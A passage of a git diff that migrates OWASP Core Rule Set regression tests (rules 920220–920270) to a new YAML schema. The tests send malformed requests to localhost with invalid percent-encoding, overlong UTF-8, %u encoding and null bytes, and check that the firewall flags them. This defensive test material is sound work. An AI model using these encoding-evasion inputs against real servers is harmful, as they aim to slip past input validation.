headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920220] + - test_id: 5 + desc: | Detect incomplete URI encoding sequence (`bxy`, with crippled encoding of `b`). Note that the second character must not complete the `%6` to a valid sequence. stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get?parm=%6%78%79" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920220\"" - - test_title: 920220-6 - description: Detect incomplete URI encoding sequence, single `%` (`bad%`) + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get?parm=%6%78%79" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920220] + - test_id: 6 + desc: Detect incomplete URI encoding sequence, single `%` (`bad%`) stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get?parm=%62%61%64%" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920220\"" - - test_title: 920220-7 - description: Do not inspect file names for invalid URI encoding (`Taxes20%Done.txt`) + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get?parm=%62%61%64%" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920220] + - test_id: 7 + desc: Do not inspect file names for invalid URI encoding (`Taxes20%Done.txt`) stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get/Taxes20%25Done.txt" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920220\"" - - test_title: 920220-8 - description: Do not inspect file names for invalid URI encoding (`Taxes20%Done.txt`), with query + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get/Taxes20%25Done.txt" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920220] + - test_id: 8 + desc: Do not inspect file names for invalid URI encoding (`Taxes20%Done.txt`), with query stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get/Taxes20%25Done.txt?x%20y" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920220\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get/Taxes20%25Done.txt?x%20y" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920220] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml index 54515ef4b..e6e2bf592 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml @@ -1,37 +1,36 @@ --- meta: author: "Max Leske, azurit" - enabled: true - name: "920221.yaml" description: "Detect invalid URI encoding in the last path segment of the URI" +rule_id: 920221 tests: - - test_title: 920221-1 - description: Detect invalid URI encoding in decoded URI (`%w20`) + - test_id: 1 + desc: Detect invalid URI encoding in decoded URI (`%w20`) stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get/%25w20" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920221\"" - - test_title: 920221-2 - description: Ignore invalid URI encoding if the last path segment looks like file name (`%w20`) + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get/%25w20" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920221] + - test_id: 2 + desc: Ignore invalid URI encoding if the last path segment looks like file name (`%w20`) stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get/%25w20.txt" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920221\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get/%25w20.txt" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920221] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml index 0c985df20..1eb6b6c52 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml @@ -1,43 +1,41 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920230.yaml" - description: "Description" +rule_id: 920230 tests: - # From old modsec regression tests - test_title: 920230-1 + test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?parm=%25%37%33%25%36%46%25%36%44%25%36%35%25%37%34%25%36%35%25%37%38%25%37%34%25%35%46%25%33%31%25%33%32%25%33%33%25%33%34" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - version: "HTTP/1.1" - output: - log_contains: "id \"920230\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?parm=%25%37%33%25%36%46%25%36%44%25%36%35%25%37%34%25%36%35%25%37%38%25%37%34%25%35%46%25%33%31%25%33%32%25%33%33%25%33%34" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + version: "HTTP/1.1" + output: + log: + expect_ids: [920230] - # From old modsec regression tests - test_title: 920230-2 + test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?parm=%7%6F%6D%65%74%65%78%74%5F%31%32%33%" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920230\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?parm=%7%6F%6D%65%74%65%78%74%5F%31%32%33%" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920230] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml index 9661f48a0..3cea2441c 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml @@ -1,135 +1,133 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920240.yaml" - description: "Description" +rule_id: 920240 tests: - - test_title: 920240-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "POST" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Content-Length: 11 - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: "x=new %w20$" - stop_magic: true - version: "HTTP/1.1" - output: - log_contains: "id \"920240\"" - - test_title: 920240-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Content-Length: 11 + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: "x=new %w20$" + autocomplete_headers: false + version: "HTTP/1.1" + output: + log: + expect_ids: [920240] + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "POST" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Content-Length: 10 - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: "x=new %20$" - stop_magic: true - version: "HTTP/1.1" - output: - no_log_contains: "id \"920240\"" - - test_title: 920240-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Content-Length: 10 + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: "x=new %20$" + autocomplete_headers: false + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920240] + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "POST" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: "param=value" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920240\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: "param=value" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920240] - # We have a valid percent encoding here - test_title: 920240-4 + test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "POST" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - Content-Type: "text/xml" - uri: "/" - data: | - - - - http://www.w3.org/2002/03/xkms#Pending - %1Gwww.attack.org - - - - version: "HTTP/1.1" - output: - no_log_contains: "id \"920240\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + Content-Type: "text/xml" + uri: "/" + data: | + + + + http://www.w3.org/2002/03/xkms#Pending + %1Gwww.attack.org + + + + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920240] - # test URL Encoding Abuse Attack Attempt from old regression tests - test_title: 920240-5 + test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "POST" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - Content-Type: "application/x-www-form-urlencoded" - Content-Length: "9" - uri: "/" - data: "param=%1G" - stop_magic: true - version: "HTTP/1.1" - output: - log_contains: "id \"920240\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + Content-Type: "application/x-www-form-urlencoded" + Content-Length: "9" + uri: "/" + data: "param=%1G" + autocomplete_headers: false + version: "HTTP/1.1" + output: + log: + expect_ids: [920240] - # test URL Encoding Abuse Attack Attempt from old regression tests - test_title: 920240-6 + test_id: 6 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "POST" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - Content-Type: "application/x-www-form-urlencoded" - uri: "/" - data: "param=%7%6F%6D%65%74%65%78%74%5F%31%32%33%" - version: "HTTP/1.1" - output: - log_contains: "id \"920240\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + Content-Type: "application/x-www-form-urlencoded" + uri: "/" + data: "param=%7%6F%6D%65%74%65%78%74%5F%31%32%33%" + version: "HTTP/1.1" + output: + log: + expect_ids: [920240] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml index 0f75ddbc8..ebfc6cc54 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml @@ -1,80 +1,78 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920250.yaml" - description: "Description" +rule_id: 920250 tests: - # crs-setup.conf needs to have CRS_VALIDATE_UTF8_ENCODING set # Taken from existing modsec regression - test_title: 920250-1 + test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?param=%c0%af" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - version: "HTTP/1.1" - output: - log_contains: "id \"920250\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?param=%c0%af" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + version: "HTTP/1.1" + output: + log: + expect_ids: [920250] - # Taken from existing modsec regression - test_title: 920250-2 + test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?param=%c0" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - version: "HTTP/1.1" - output: - log_contains: "id \"920250\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?param=%c0" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + version: "HTTP/1.1" + output: + log: + expect_ids: [920250] - # Taken from existing modsec regression - test_title: 920250-3 + test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?param=%F5%80%BF%BF" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - version: "HTTP/1.1" - output: - log_contains: "id \"920250\"" - - test_title: 920250-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?param=%F5%80%BF%BF" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + version: "HTTP/1.1" + output: + log: + expect_ids: [920250] + - test_id: 4 desc: "Status Page Test - Invalid UTF-8 encoding: %C2%A3 is a valid Pound sign; %E2%A3 is invalid UTF-8 (incorrect starting binary sequence)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?param=%E2%A3" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - version: "HTTP/1.1" - output: - log_contains: "id \"920250\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?param=%E2%A3" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + version: "HTTP/1.1" + output: + log: + expect_ids: [920250] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml index dc65d1722..074276e9f 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml @@ -1,53 +1,51 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920260.yaml" - description: "Description" +rule_id: 920260 tests: - - test_title: 920260-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=%uff0F" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920260\"" - - test_title: 920260-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get?test=%uff0F" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920260] + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=%u0F" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920260\"" - - # Test taken from existing modsec regression - test_title: 920260-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get?test=%u0F" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920260] + - test_id: 3 + desc: Test taken from existing modsec regression stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?param=foo%uFF01" - version: "HTTP/1.0" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - output: - log_contains: "id \"920260\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get?param=foo%uFF01" + version: "HTTP/1.0" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + output: + log: + expect_ids: [920260] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml index 5df5cf568..5ddeb17d6 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml @@ -1,141 +1,135 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920270.yaml" - description: "Description" +rule_id: 920270 tests: - - test_title: 920270-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test%00=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920270\"" - - test_title: 920270-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test%00=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920270] + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1%00" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920270\"" - - test_title: 920270-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1%00" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920270] + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test%00=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920270\"" - - # This causes apache to error before it gets to CRS. Therefore - # we'll mark this as a status 400 now until the FTW OR output is added - test_title: 920270-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test%00=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920270] + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost%00" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - status: [403, 400] - # log_contains: "id \"920270\"" - - test_title: 920270-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost%00" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + status: 400 + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Referer: "anything%00" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920270\"" - - test_title: 920270-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Referer: "anything%00" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920270] + - test_id: 6 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test%40=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920270\"" - - test_title: 920270-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test%40=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920270] + - test_id: 7 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test%FD=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920270\"" - - test_title: 920270-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test%FD=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920270] + - test_id: 8 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test%FD=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920270\"" - - # Test converted from old tests - test_title: 920270-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test%FD=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920270] + - test_id: 9 + desc: Test converted from old tests stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?param=foo%00" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - version: "HTTP/1.1" - output: - log_contains: "id \"920270\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?param=foo%00" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + 